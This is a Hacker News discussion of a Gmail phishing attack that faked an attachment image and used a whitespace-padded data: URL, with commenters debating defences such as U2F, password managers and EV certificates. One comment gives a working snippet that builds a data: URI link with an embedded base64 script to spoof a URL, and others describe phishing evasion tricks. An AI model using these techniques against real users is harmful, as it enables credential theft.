And then that phishing email with the right theme and message arrives with a perfect timing, when you were just expecting an email like that. It happens.

reply

[–] sixothree link

This describes my experience many years ago. I woke up early and groggily read my through my emails. One of which was an angry message from an ebay buyer about a package not having arrived on time. I clicked and logged in and got an error message. Examining the email it was certainly phishing. Changed password immediately.

I believe this may have been before ebay took phishing seriously by included your real name in the emails etc.

reply

[–] frogfuzion link

I think its naive to believe that even the most tech savvy are immune to phishing. People get tired, hurried, stressed - and during those moments anyone's guard can be let down.

reply

[–] caleblloyd link

Password managers really shine at times like these. It's especially helpful if when using complicated auto-generated passwords. That way you don't readily "know" your password so the first thing you do is look to autofill.

It's still a good idea to have an analog backup of really important passwords. Like if you use Gmail and it is the password reset email for everything else, print out the generated password and put it somewhere safe. Just incase your password manager becomes insolvent one day.

reply

[–] unholiness link

> Password managers really shine at times like these

I agree on some levels, but password managers can and have had vulnerabilities[0] that can allow the gmail password to be populated despite the wrong domain. Given that the autofill adds legitimacy and reduces friction, it could make this particular scenario go from bad to worse.

[0] https://labs.detectify.com/2016/07/27/how-i-made-lastpass-gi...

reply

[–] chki link

I would argue that it is probably a good idea to print out all your passwords every month or so as there is not much risk attached to it (thieves do not usually look for these things).

reply

[–] mike-cardwell link

"I don't have images loaded by default for unknown senders"

Does this just prevent the display of images which require fetching from a remote URL, or does it also include images which are embedded in the email as attachments?

reply

[–] hobarrera link

Aside from the fact that this was not an external image, it was also emails to him by a friend.

reply

[–] Tepix link

It does not prevent this if the image is attached to the mail.

reply

[–] eridius link

An even more common way of making it load without causing the email to look like it has an attachment is to embed the image as a data: URI in an <img> tag. Since it's not remote, it will be loaded, but since it's not an attachment, your email client won't show it in the attachments list.

reply

[–] Jarwain link

Assuming the attack is the same as what jhardcastle experienced, the email is propagated by sending emails to those who have received emails from the victim before. Alternately, it would be a known sender sending you that email.

reply

[–] TillE link

Right, I almost never manually enter passwords on the web. If LastPass isn't automatically filling the field, something is very wrong.

It's a nice extra security check, in addition to the primary benefits of using a password manager.

reply

[–] murkle link

The Twitter thread says the image is embedded so I guess will still show?

reply

[–] Ajedi32 link

In my case, I likely would have noticed that:

1. The download link didn't show any hover effect when I moused over it

2. Google is asking me to sign in even though I was obviously already authenticated

3. Even if at this point I didn't think to glance at the URL bar and actually entered my password into the phishing page, U2F would save me from being fully compromised

reply

[–] pasta link

This is the reason why I convert all incoming to plain text. It saved me from trackers and fishers so many times.

reply

[–] slazaro link

The only two things that I think could have prevented me from falling for this is: I don't have images loaded by default for unknown senders, and LastPass wouldn't match the domain and therefore wouldn't show the button to autocomplete on the password box.

Depending on how observant I'd be at the moment, I might check the URL bar and see something fishy. But I could fall for this, which is worrying.

reply

[–] dvh link

    <a href="data:text/html,valid_looking_url    <script src=data:text/html;base64,YWxlcnQoMTIzKQ==></script>">clickme</a>
Or if you want to reproduce it console:

    a = document.createElement('a');
    a.href = 'data:text/html,valid_looking_url    <script src=data:text/html;base64,YWxlcnQoMTIzKQ==></script>';
    a.textContent = 'clickme';
    a.style.position = 'fixed';
    a.style.left = 0;
    a.style.top = 0;
    a.style.zIndex = 9999;
    document.body.appendChild(a);
The "valid_looking_url" will appear in document but it can be hidden from page by script or made transparent using css

reply

[–] mike_hearn link

It's a hard problem but the industry isn't doing as much as it could do. There's low hanging fruit that has gone unharvested for years at most big companies.

1. Reform the browser address bar. Safari does this right. Chrome, IMHO shamefully, does not. The address bar is completely ignored by a large fraction (I've read it's about 25%) of users because it's full of meaningless technobabble. These users navigate entirely by sight. Weak sauce changes like making some of it light grey instead of black makes no difference. The usability nuclear holocaust that is the browser address bar is in my view THE leading cause of phishing because it's rendered users unable to identify who they are talking to when they submit data via the web. The address bar should show the domain name only, or the EV identity when that's present, and the browser industry should adopt practices to push usage of EV SSL everywhere. Only EV SSL is a feasible approach to get the actual, legal, verified identity of a server operator on the users screen in a reliable and scalable way.

2. The big networks need to lead by example and adopt EV SSL, see above.

3. Kill re-authentications dead. Google was talking about this internally around the time I was working on the account system there, but I don't recall if they ever did it. For as long as web sites routinely ask users to re-authenticate at seemingly random times users will type their password into any page that looks right without thinking. Only by making authentication a very rare event can you start to convince users to take more care over checking the site origin. I think Facebook has got this right: I don't think I'm ever asked to sign in to Facebook unless I'm using a new device, but lots of websites don't.

4. Teach UI/UX designers about the dangers of designing user interfaces where attacker controlled content isn't strongly visually separated from system controlled content. In this era of personalisation and theming there's really no reason why things like the Gmail attachment icon needs to be placed right next to the content of an email with the same generic white background as attacker controlled content. Give it a semi-transparent background and set users up with a wallpaper-esque theme by default and it gets a lot harder to put things in a message that look like UI widgets.

reply

[–] thomasahle link

> 1. Reform the browser address bar. Safari does this right. Chrome, IMHO shamefully, does not. ... The address bar should show the domain name only, or the EV identity when that's present,

Chrome on Android does this. And it's extremely annoying. Since mobile browsers (and desktop browsers with tabs) usually don't show the title of pages, the address bar is the only place to tell e.g. what Wikipedia page you're currently reading.

You are probably correct, that it's a win for security, but I wish it could be turned off.

reply

[–] gcp link

We tried this in Firefox for Android and user outcry was so bad it had to be turned off almost immediately.

There's some tricks now to make sure the domain is visible and highlighted, but IMHO not enough to be safe, especially with the address bar scrolling of screen on phones.

reply

[–] mike_hearn link

Wikipedia pages have the title at the top of the page.

In practice, the sort of users who complain about such things are in my experience the sort who also have dozens of tabs open, which smushes the title down to just a few characters. Heck even when there's space in the tab bar Chrome won't allocate more than a few cm of space on screen to showing the title. HTML titles are pretty much a dying thing anyway, so given the ongoing pain caused by phishing I wouldn't hesitate to pull the plug on them.

reply

[–] thomasahle link

On mobile, scrolling to the top of a Wikipedia page can be 20 screens or more. After that it's a lot of working going back to where you were. Many news sites are similar.

reply

[–] eridius link

You could just pop open the tab view, so you can see the page title.

reply

[–] fornever link

I'll admit the situation would get slightly better, but all these incremental fixes doesn't deal with the real problem. Which is that authentication is treated no different from any other data. If authentication was treated differently you could quite easily...

1. Distinguish clearly between authenticating to the correct server and entering form data.

2. Not send the actual password to the server but instead use some form of challenge-response.

3. Store the authentication token securely i.e. not as a cookie.

4. Enable other forms of authentication e.g. with keys.

5. Decrease the use of passwords overall (though better password authentication would still be a win).

This would make it much harder to perform a range of attacks from phishing to session hijacking. It would also potentially increase privacy, since you could more easily disable things like tracking. The reason you don't see the improvements you mention is to some extent because the engineers in question would have to reconciliation with the idea that they are the ones responsible. It's much easier to hold the position that its other entities, or users, that don't understand how things work.

reply

[–] sly010 link

> 3. Kill re-authentications dead.

Then I would forget my password, like I always forget my github password and have to reset it every leap year when i log out for some reason, but i guess that's a small price to pay.

reply

[–] jungletek link

Password Safe is a (Bruce Schneier recommended) alternative. Free, runs locally. I'm a big fan.

https://pwsafe.org/

reply

[–] uwu link

you should invest in a password manager (i use keepass)

reply

[–] sly010 link

I have. I use 1Password for about a year now. But I didn't log out (hence log in) of github since I installed it and as a result it (1password) doesn't know my github password. And frankly nor do I. So my point is valid, at least until next time I have to relogin.

Case in point: I also use Authy with backup, but I don't store my backup password in the password manager, because that would be a potential single point of security failure. The app kindly asks for a backup password occasionally. It's not for access, but for reminder. In fact if I don't remember my password, I can reset it right there in the app. I find that feature very useful.

reply

[–] Groxx link

I'll toss on 5: iframes are the devil. Incredibly useful, obviously, but they also teach users to e.g. type in their payment-widget password in any domain, just because it appears after clicking a correct-looking button. They don't have a visible URL, or even a border, so there's no way for users to know that X isn't from this site, even if some other technique successfully made them aware of what site they were on.

reply

[–] marcosdumay link

#0 - Get browsers to agree on some protocol for client side certs, and make them usable. That voids the need for #s 1, 2, 3, or 4.

reply

[–] mike_hearn link

Make key management as user friendly as passwords and I'll agree. I don't think it's going to happen any time soon.

reply

[–] lol768 link

> The address bar should show the domain name only, or the EV identity when that's present, and the browser industry should adopt practices to push usage of EV SSL everywhere. Only EV SSL is a feasible approach to get the actual, legal, verified identity of a server operator on the users screen in a reliable and scalable way.

EV certs have their place, but I'm not sure they're better than a URL that you're familiar with. For example, Natwest uses an EV cert which displays as "The Royal Bank Of Scotland Group Plc" because it's part of a larger group, but the actual legal name of the firm is "National Westminster Bank Plc".

Additionally, what happens when we get companies in different sectors with similar names? If there's an "RBS Applications Ltd" that gets an EV cert which was later compromised and used for phishing I wouldn't suspect it was wrong.

> Kill re-authentications dead. Google was talking about this internally around the time I was working on the account system there, but I don't recall if they ever did it. For as long as web sites routinely ask users to re-authenticate at seemingly random times users will type their password into any page that looks right without thinking. Only by making authentication a very rare event can you start to convince users to take more care over checking the site origin. I think Facebook has got this right: I don't think I'm ever asked to sign in to Facebook unless I'm using a new device, but lots of websites don't.

And what do we do with the problem of users leaving their computers open and exposed for short periods? I Like GitHub's sudo feature, it helps ensure that sensitive actions (adding SSH keys, adding access tokens etc) require a confirmation.

An alternative could be to require a 2FA-only confirmation rather than a password check.

> Teach UI/UX designers about the dangers of designing user interfaces where attacker controlled content isn't strongly visually separated from system controlled content. In this era of personalisation and theming there's really no reason why things like the Gmail attachment icon needs to be placed right next to the content of an email with the same generic white background as attacker controlled content. Give it a semi-transparent background and set users up with a wallpaper-esque theme by default and it gets a lot harder to put things in a message that look like UI widgets.

Completely agreed on this. The rollover animations and other features that seem to be declining in use with the advent of flat design are also a great help here, because you can't achieve that sort of interactivity with an image.

Worth noting that I suspect there would've been some tells anyway with this sort of attack. The cursor would've been wrong over the entire image (hand not just over the button) and any subtle click animations wouldn't have worked.

reply

[–] mike_hearn link

If the legal name is Nationwide they should be able to get an EV cert under that name. Perhaps they just haven't bothered to do so?

The point of an EV cert is only half to give user meaningful names. The other half is that there's a meaningful level of verification done on the ownership of the name. If you're creating fake companies for the purposes of getting phishy EV cert names, it should be a lot easier to track down who you are. The standards around them are much more carefully spelled out than for DV certs.

Leaving your computer exposed is what lock screens are for.

reply

[–] mikeash link

One problem with URLs you're familiar with is lookalike URLs that appear to be something you're familiar with. Would you notice that you're visiting natwеst.com instead of natwest.com?

reply

[–] mathattack link

I think the move has to be from "Keeping your system from being compromised" to "Detecting the compromise after it's happened".

reply

[–] xmodem link

Thanks for sharing this - this is fiendishly clever. Even with all the investment in infosec, we're still woefully unprepared to deal with this type of attack. We need to start thinking about new approaches to protect users.

reply

[–] SamBam link

It sounds like the attackers got in almost instantly -- presumably they logged in via script, not a human. Changing your password at that point would probably be like closing the stable door after the horse has bolted.

Still useful, I guess, because it lets you know immediately what's up, so you can send out emergency emails to your contacts.

reply

[–] sly010 link

The plugin actually alerts you the moment you press down the last key on your keyboard, before you could even press enter, so you don't even get a chance to submit the password.

But even if you assume at that moment the attacker has your password... I had seen gmail takeovers live and Google's authentication system allows you to recover an account even after it was taken over as long as you still have the old methods of authentication and you are within an unspecified timeframe.

Of course you will have to spend the day cleaning up your email filters and apologizing all your contacts, but at least you will have your account back.

reply

[–] sly010 link

There is also a password alert chrome plugin by google [0].

If you ever enter your google password on any domain other than accounts.google.com. It will immediately alert you and give you a link to change your password. It can handle multiple passwords too if you have multiple google accounts.

[0] https://chrome.google.com/webstore/detail/password-alert/noo...

reply

[–] blauditore link

As a side note, it looks like this couldn't have happened with an external mail reader like Thunderbird. Even when targeted to that and mocking some other UI element, clicking the link would open a browser window and reveal the fraud, at least to power users.

I'm not advocating against web-based mail readers, simply because it's not always possible or practical to use external ones. But it seems security is harder to implement because everything is "made of the same parts", i.e. a web-based mail displayed in a web-based application, opening links in the same (browser) window.

reply

[–] jhardcastle link

They aren't using popular attachments. They are using customized attachments from the actual compromised sender. I commented elsewhere in the thread, but once they gain your credentials, they will go into your account to get one of your attachments, and then email a screenshot of that to your contacts, some of whom may have already seen that attachment.

reply

[–] pcl link

Sure, but the chrome around the image is still "trusted attachment" chrome.

I get it that the browser ppl will say only their chrome is trusted, but when someone is using your app, your app's internal ui affordances receive that same level of trust in your users' minds.

reply

[–] gushie link

I'm surprised that with Google's image detection technology that Gmail doesn't do image recognition on images with links where the image look like popular document attachment, and send them to spam. Or perhaps they do but the phishers are able to evade it.

reply

[–] rerx link

Once I almost fell for an extremely well made Paypal-phishing mail. It was late at night and I had just made a purchase via Paypal at a very small web shop. The timing was so perfect to catch me off guard that I am certain that site had been broken into to gather my email address.

reply

[–] kinkrtyavimoodh link

What do you do for "Sign in with your Google Account" situations?

reply

[–] qntty link

I personally never sign in with a google (or any other) account, I always sign up for new accounts with my email.

reply

[–] vilhelm_s link

Shouldn't this still work? I think if you are signed in on gmail, then if a third-party site asks you to log in, it will pop up a window with just a button saying "authorize", you should not be asked to enter your password again...

reply

[–] undefined link
[deleted]

reply

[–] ronnier link

I don't. I don't sign in with my gmail anywhere. It has the keys to my kingdom, so I treat it with special care.

reply

[–] undefined link
[deleted]

reply

[–] ronnier link

My rule for gmail... I type gmail.com then log in. That's the only path I take to log in. I never click a link and log in, etc. really I do this for most sites I use.

reply

[–] rovek link

I'd be really interested to see the increased success rate. Even if the most tech-savvy weren't fooled (I'm not so sure), I would be surprised not to see a vast increase from your average misspelled ecommerce phishing email. Shame those crooks don't practise open data.

reply

[–] jfoldager link

That is very well done. I only see people suggesting 2-factor auth as a remedy, but I guess any password manager would work as well. You wouldn't even get to the point of compromising your password.

I use 1password, which will only fill in the password associated with the current domain.

reply

[–] jpl56 link

Yes! They do it for banknotes (it's impossible to scan or xerox them). They could do it in the same way for login pages!

reply

[–] new299 link

I guess it's an aims race, but I would guess there are a few potential ways to mitigate against this:

1. Watermark all images on the in-email preview. 2. You should be able to design a mail scanner which would detect images that look too much like gmail elements and flag them.

reply

[–] twostoned link

I have been reading the comments wondering if this was a specific GMail webmail thing. I'm guessing that using IMAP or POP3 through an email client will make this harder? I'm by no means without risk but I rarely use the GMail web-client so wasn't sure exactly what the scam was

reply

[–] zbuf link

The problem here is monopoly, or mono culture.

The whole world is, basically, using one email client. The lack of diversity means a well written scam like this spreads easily.

I can say for certain I'd never fall for this scam -- because it looks like crap in Pine. I know I'm special, but the same applies to Thunderbird, or whatever.

There's probably a parallel to biology here. Let's get diversity back in our internet culture and with it resistance; scams like this will be harder to convince and much less likely to spread. Hopefully removing some of the incentive, too.

reply

[–] camus2 link

> The problem doesn't get better until we destigmatize it.

Absolutely, it can happen to anyone. I'm sick of people here or on other forums who do some victim blaming, calling phishing victims "idiots". It's not going to solve the problem. And often Gmail or Chrome teams dismiss these kind of issues.

I had to revert to the html version of Gmail because I was sick of all the phishing attempts and disable images in the client.

reply

[–] jmbmxer link

As a security professional, I'm wired to loathe shortened links. This is a great example and exactly why I created a little hobby Chrome extension to expand all shortened links for inspection - https://unshorten.link

reply

[–] mike-cardwell link

Depends on the type of 2FA. If it's using U2F, then you'd be fine as that is tied to the domain name of the site you're on, but if it's using TOTP/HOTP (i.e. Google Authenticator), and the phishing site asked you for your 2FA code, and you gave it, then you would still be successfully phished.

reply

[–] thomasahle link

Is the difference here that TOTP/HOTP is entered by the user, while U2F is entered automatically?

reply

[–] mike-cardwell link

Yes. With U2F the recipient of the token is verified by a machine. With TOTP/HOTP it is verified by the user looking at the browser address bar.

reply

[–] Niten link

Not entirely. The important difference is that instead of generating a secret on the token and passing it to the server, U2F has the token answer a challenge issued by the server and encrypted to the token's (per-domain) public key, stored by the server at token registration time.

The corresponding private key is stored on the token indexed in part by the requesting domain, which is supplied by the browser during an auth request. It is because of browser participation that a MITM domain would not be able to ask the token to answer the challenge with the correct key handle.

The actual implementation can differ from what's described above, see Yubico's description of their key wrapping scheme if you want more detail:

https://www.yubico.com/2014/11/yubicos-u2f-key-wrapping/

reply

[–] danieldk link

Besides what mike-cardwell says, TOTP relies on a shared secret, while U2F uses challenge response authentication. Even if a MITM captures the (encrypted) challenge-response sequence, a new authentication requires a new challenge-response.

reply

[–] dividuum link

Not necessarily. Depends on how sophisticated the attack is implemented. They are MITM'ing you at that point, so it's entirely possible to not only capture username/password but also the 2FA token.

reply

[–] crashdown link

Must do surely. The attackers would have your email and password but wouldn't be able to login?

reply

[–] slig link

What is stopping them from showing the TFA screen and asking for you to type the number?

reply

[–] JorgeGT link

Well, Google TFA doesn't ask you to type your number (and others only some digits) so it probably would rise a red flag big enough to "awake you" from auto-pilot, I hope.

reply

[–] mike-cardwell link

I assume you're using the type of 2FA where this is not the case. We are discussing the type of 2FA where Google does ask you to enter your number. I.e, TOTP. When I log into Google, it asks me to type my 2FA number in.

reply

[–] JorgeGT link

Ah, I didn't know Google offered TOTP. I only had the option of mobile phone SMS 2FA.

reply

[–] volent link

Yes

reply

[–] hvidgaard link

Yes. That is the point of 2FA. Require something more than login credentials, preferably something physical you possess for an actual login to be successful.

reply

[–] spydum link

Incorrect: U2F would prevent this, but simple 2FA challenge could simply be displayed at the next screen of the form, and once you submit, the malicious server could immediately use the token you provide. U2F does mutual auth of the u2f service, so it should fail.

reply

[–] hvidgaard link

U2F prevents mitm attacks, which this is an instance of. Using Google standard 2FA and save the machine/browser for 30 days it would pop up and say you need your 2FA, which would be suspicious. With U2F it would say the service is unknown, which is equally suspicious. But my point was simply that it prevents the attack with only the login information, not that the attack can be futher refined to get your 2FA token.

2FA is a great way to know when you have to look at all the data to decide wether or not to give the token. For instance, I always double check the URL when I'm about to hand out a 2FA code.

reply

[–] _wdh link

That's scary. Would having 2FA enabled on your Gmail account protect you from this kind of attack?

reply

[–] eridius link

What's the point of that one? Just hoping that the user selects the same security questions and/or password as their google account?

reply

[–] scardine link
[–] martin-adams link

I nearly fell for this attack if it weren't for my email address on the fake Google login not being autofilled. That made then look at the URL, and my ultrawide monitor revealed a cunning URL that had some white space padding to hide the real URL.

reply

[–] martin-adams link

You can create application specific passwords, but I don't know if you can log in to the master account with those.

But you can generate backup codes that you can print out or store somewhere safe for that emergency.

reply

[–] greenspot link

Always smiled at phishing scams but this scares the hell out of me, so I just headed to Google to setup 2-factor authentication.

How is your experience?

I understood that I can register specific machines not to use 2-factor, so if I loose my phone I still can login in. Anything else to consider?

reply

[–] tantalor link

I was about to ask why don't browsers prompt for confirmation when submitting a password on an unfamiliar domain, but then I realized the fake login page would just use a normal text field instead of a password field and fake the password dots.

reply

[–] swalsh link

I think it's time for Google to implement the personalized icon thing Banks have when logging in. I definitely classify my email to be near as important security wise as my banking information.

reply

[–] mike-cardwell link

You mean, if the phishers sent text email instead of html email, would they be less successful? Probably. So why would they?

Are you suggesting that all email/webmail clients stop rendering HTML?

reply

[–] tehabe link

I'm suggesting that companies like Google should have a plain-text option.

Long term goal is be to get rid of HTML, at least in my utopian mind as in it will never happening in reality.

reply

[–] tehabe link

I wonder if the usage of plain-text mails would reduce phishing or increase it?

reply

[–] roywiggins link

It's not Javascript, it's a data URI that renders an HTML page.

reply

[–] _nalply link

which contains JavaScript

reply

[–] lenkite link

IMHO javascript should never have been allowed in the address bar or even inline in an href. The first time I learned about this feature of a browser, I was thinking 'security defect'.

reply

[–] espadrine link

1Password is great, but it solves a problem that we should get rid of.

It converts the n-websites-n-passwords situation into one where passwords become random tokens unlocked by a single client-side secret.

We need to make U2F more widespread.

reply

[–] mikeash link

This is a lesser-known benefit of password managers that autofill (or at least auto-look-up) passwords in web pages. I might fail to notice a wonky address bar, but 1Password will notice.

reply

[–] TeMPOraL link

> Why would you need to sign in if you're already in your gmail? Not to say there's anything obviously wrong, one could easily go there.

I can't tell you why, but I'm pretty sure it happens - I have a recollection of having to reauthenticate every few weeks or so when opening a Google Drive attachment from my Inbox window. So I would not be surprised if I saw a login screen after clicking on such an "attachment".

reply

[–] artofcode link

Session timeout? I believe mail hosted by google/gmail for companies can have rules setup that logins are invalidated after some time. I have this with my company e-mail for example. One would be even easier tricked if that's the case.

reply

[–] wakkaflokka link

I know that when using some services from Google, like Google Takeout, it asks you to authenticate regardless of whether you are already logged-in or not.

reply

[–] phkahler link

Why would you need to sign in if you're already in your gmail? Not to say there's anything obviously wrong, one could easily go there.

It does point out a major problem. Email used to be text only. Then we added attachments that needed to be saved as a file and read with whatever app. Then we went to automatically displaying attached images and having live HTML links. All of these things we do for convenience make this sort of attack more possible.

reply

[–] suprjami link

The closest I ever came was a Nigerian scam where a crown prince had been one of the first people on a space station in the 90s, but his return seat was taken up by cargo when they decommissioned the satellite, so they just left him in orbit.

After 15 years alone in space he was "in good spirits" but wanted to come home and would share his overtime flight pay of $15M with me.

Seriously where do they find these stories.

reply

[–] greggman link

I actually did get phished by this. I think I just got lucky I had 2fa on and they didn't phish that too

http://blog.greggman.com/blog/getting-phished/

The worst thing is I don't know how to help my less technical friends not fall for it. They are unlikely to use 2fa I think

reply

[–] sundvor link

Hm, a give-away would be that the image would most likely not be interactive like it is now for me (Chromium). I.e. a PDF attachment footer "icon" renders the preview, and then action buttons when hovering the mouse over it. The buttons are then changed to darker colours with alt text when hovering over them again.

Or did they manage to embed the JS to simulate these actions with the attack?

reply

[–] chinathrow link

The 2FA token is valid for up to 1 minute and the attacker could easily ask for it as well...

There were no image downloads, it was embedded within the message itself.

reply

[–] Dangeranger link

Ok that's valid. Other than blocking bit.ly and other commercial link sharing services this seems to be a human hacking problem. It's hard to get people to be careful about checking the URL on a login page.

reply

[–] Dangeranger link

Use 2-Factor Auth. If you are a sysadmin make it required. Block image downloads by default. Turn on log in notifications for unknown devices. If you are a sysadmin in a controlled network and serve content via proxy block bit.ly. This is a clever and dangerous attack, but can still be avoided by following the above.

reply

[–] elchief link

A reminder that U2F essentially prevents phishing attacks:

http://security.stackexchange.com/questions/71316/how-secure...

reply

[–] jsz link

I've seen this before and nearly fell for it myself. If I didn't have auto fill for google account logins I would definitely fall for this. I noticed immediately when it made me type in my email and password and had no records of my other accounts.

reply

[–] bitskits link

Some further reading on the subject by lcamtuf (from 2011): https://lcamtuf.blogspot.com/2011/12/old-switcharoo.html

reply

[–] CGamesPlay link

One of my users was hit by this recently. Another interesting tactic they used was a redirect to the fradulent login page. This way, as soon as it was reported as phishing to google, they just incremented a number in the URL and could continue harvesting.

reply

[–] bad_user link

EV certificates don't work. You're relying on the user to spot a change in the address bar, which is no different than relying on the user to notice that the domain is not "gmail.com".

HTTPS is meant for preventing MITM attacks, but it isn't meant to validate the identity of the entity you're speaking to; even though some people try doing that, it's just a game of pretend.

reply

[–] MrManatee link

I totally agree that EV certificates don't work. I know the difference between EV and DV, but I'm glad I don't have to rely on that knowledge very much. I don't trust myself that I would notice if an EV site would suddenly have a slightly different looking DV-style lock icon. I don't even trust myself to remember which sites use EV in the first place.

As many other commenters here, I mostly rely on password autocompletion. If autocompletion doesn't recognize the site, then I'm extra careful. The point is that this is rare enough so that it is actually feasible for me to be careful on those occasions.

reply

[–] andygambles link

It is a much more visible change rather than a URL that could be spoofed or malformed.

reply

[–] sowpati link

I'm not an expert, but as I understand, they don't actually use password fields on phishing pages. Instead they use normal text fields and fake password dots. So I'm not sure if they can be identified as login pages.

ETA: another parent comment talks about the same thing.

reply

[–] andygambles link

In general they should use EV site wide rather than just login pages just to help confirm it is the correct legitimate website.

reply

[–] andygambles link

The aim of EV certificates is to reduce such risks and highlight to the user the legitimacy of such websites.

HTTPS alone only provides encryption. Google doesn't use EV anywhere but I feel it should on login pages especially given it is a high phishing target.

reply

[–] wnevets link

If google still disabled images by default this would of been defeated

reply

[–] TimWolla link

They already do this: On a known computer (logged in at least once) your Google+ photo and name is shown.

see: https://i.imgur.com/96uZRPC.png

reply

[–] btown link

So then they use a botnet to input your username on google.com to get your image, then stream it to you.

reply

[–] undefined link
[deleted]

reply

[–] safe001 link

how about use 3-step auth?

1. you input your username

   google send back an msg/pic which you saved in google at last login

   confirm then goes to step 2

2. you input password

3. google ask you input auth code

reply

[–] et-al link

Part of why we're impressed (and dismayed) is that they use a data URL to look like "accounts.google.com" and to load a remote script out of sight to the right of all the spaces. Maybe the URL protocol didn't fool you, but I think there are a good number of users out there who have been "trained" to check the URL to see that it says "accounts.google.com" and think it's fine.

And while clicking on an attachment shouldn't sign out a user, being automatically signed out has happened enough to most people that it seems like a fairly innocuous event, especially since this is supposed to be an attachment, not a link, and you just need to sign back in. So one does.

reply

[–] Ajedi32 link

So how is this any different from using a URL like `accounts.google.com.googlelogin.cz` instead? I mean, yes obviously using a `data:` URL is certainly creative, but is it really any more effective?

reply

[–] shadowlord link

Yes, getting automatically signed out is a normal thing. And of course, the user wouldn't suspect that it was the attachment that caused that. So yes, I see it now how this is a legitimate concern.

reply

[–] skykooler link

An attachment could take you to a login page if your Google account was logged out after you loaded Gmail. I've actually had this happen when I suspended my laptop (with a gmail tab open), got on a plane, and opened it again when I got off. When I tried to do something in Gmail again I was logged out (and when I logged in again I got the email from Google "Was this you?")

reply

[–] shadowlord link

Yes I agree, in the situation you described, this becomes a legitimate threat. Thanks for pointing that one out.

reply

[–] shadowlord link

Correct me if I'm wrong, but that embedded image (pretending to be an attachment) redirects you to a (fake) Gmail login page. How is that supposed to trick anyone? I mean, isn't it unusual (i.e. never happens) for attachments to take you to a Gmail login page? So that's suspicious behaviour right there. How is it a serious phishing attack that's getting so much attention on a platform like HN where people are used to much more sophisticated hacks? Unless you're implying that visiting that website (fake login page) itself could harm the user's device, is there some detail that I'm missing here?

reply

[–] Neil44 link

One of my clients got hit with this yesterday. Google suspended the account but only after a round of emails had gone out.

Seems like at this point the perps are just harvesting credentials.

reply

[–] wopwopwop link

This guy has an interesting YouTube channel

https://www.youtube.com/user/enyay

reply

[–] jim-jim-jim link

I started using mutt to avoid image tracking, but dodging clever stuff like this is an added bonus.

I probably would have fallen for this.

reply

[–] contravariant link

If you accept that someone is allowed to embed text documents into a URL then you also need to either allow people to link to text documents containing large runs of white space, or introduce some very weird restrictions to the kind of documents that can be embedded that way.

reply

[–] lucideer link

"legitimate" is highly subjective in this instance. Personally, I would argue that there's none. The only use case I can think of is submitting a form with arbitrary text in a field value, but most such submits should be POSTed. The main exception - search keywords - are a lot less likely to need to support repeating whitespace.

However, a better question is: do a lot of legitimate websites in the wild put multiple spaces in the address field. Obvious answer is that millions do, so there's nothing browsers can really do here.

reply

[–] cdubzzz link

Just addressing this attack in particular, is there any legitimate reason to have consecutive white spaces in a URL bar?

reply

[–] codedokode link

This could be prevented by using physical keys instead of passwords. People are weak in deciphering URL bar contents.

reply

[–] rocqua link

Cool to see Tom Scott on hackernews.

reply

[–] lanius link

Wow. Imagine if they had just used a few hundred extra spaces.

reply

[–] ravenstine link

This is why I disable images by default in my email client.

reply

[–] mxuribe link

Pretty. Damned. Clever. ...And, scary too.

reply

[–] witty_username link

A Chromebook won't help anymore than Chrome for phishing.

reply

[–] whyagaindavid link

Serious question. Does having a chromebook anyway help? How often is the google safe browsing checked?

Wondering if I should do all internet activities inside chromebook only.

reply

[–] Kiro link

This doesn't tell the whole story though. You should read the comments and see the subsequent images.

reply

[–] junto link

Thanks for posting the image. Twitter's mobile site does not allow you to zoom the image. Very annoying how mobile sites do that.

reply

[–] JorgeGT link

The most important image IMHO is the following, be sure to check it: https://pbs.twimg.com/media/C0XB_c8WIAAtEF8.jpg:large

reply

[–] yread link

To save the click:

Follow

Tom Scott (‏@tomscott):

This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy… https://pbs.twimg.com/media/C0W-dCCWQAAl0cn.jpg

reply

[–] lovich link

I don't know of a mirror but the email had an embedded image that looked like a pdf attachment in gmail. The embedded image led to a fake google sign in page when clicked

reply

[–] farresito link

"This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy..."

https://pbs.twimg.com/media/C0W-dCCWQAAl0cn.jpg

If you can't view the image, try this:

http://imgur.com/oJYWPXE

reply

[–] retube link

Twitter blocked in my location. Is there a mirror?

Edit: thanks all for help below. Yes very cunning.

reply

[–] ivrrimum link

Pretty smart idea..

reply

[–] igorigor link

Why doesn't Google, with all its brains and money, proactively write code defense against this kind of shite?

reply

[–] mderazon link

Don't trust HTTPS, any malicious site can get certificate very easily. I once almost fell for a smart Airbnb phishing attack. At some point, I was directed to https://www.airbnb.com.eubook.net/en/instant/rooms/2685603?c... to complete my booking. Website had perfectly valid SSL cert (doesn't anymore) and more importantly, check out the domain name ! Almost missed the .eubook.net part!

reply

[–] JorgeGT link

HTTPS only means "you are securely accessing this particular domain" not "the operators of this domain are nice people".

reply

[–] rvern link

That's why witty_username said to check the domain name and for HTTPS, not just for HTTPS.

reply

[–] abecedarius link

My policy is to enter it myself, maybe with help from address bar autocomplete or Google. Perhaps I should make my own portal page instead.

(The exception is some sites like Amazon that prompt for a password on certain actions. I wonder if I should worry about something weird happening like a tab left alone a long time impersonating Amazon when I get back to it.)

reply

[–] witty_username link

To stop being phished always check the domain name and for HTTPS before entering passwords.

reply

[–] pvdebbe link

Luckily I always pay attention to the URL and I consider myself being pretty safe from all sorts of phishing attacks. There have been quite a few clever ones.

reply